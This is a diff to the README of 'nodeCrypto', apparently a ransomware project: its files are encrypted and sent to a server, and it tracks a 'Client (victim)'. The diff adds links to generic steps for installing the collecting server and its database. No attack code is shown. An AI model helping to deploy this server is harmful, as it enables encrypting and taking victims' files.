SirEOF/nodeCrypto/README.md

 The files at the root of the web server will encrypt and send to the server.

 **Install server**
-Upload all file of server/ folder  on your webserver.
+Upload all file of [server/](https://github.com/atmoner/nodeCrypto/tree/master/server) folder  on your webserver.
-Create a sql database and import sql/nodeCrypto.sql.
+Create a sql database and import [sql/nodeCrypto.sql](https://github.com/atmoner/nodeCrypto/blob/master/sql/nodeCrypto.sql)
-Edit server/libs/db.php and add your SQL ID
+Edit [server/libs/db.php](https://github.com/atmoner/nodeCrypto/blob/master/server/libs/db.php) and add your SQL ID.

 **To Do**
  - [x] Client (victim)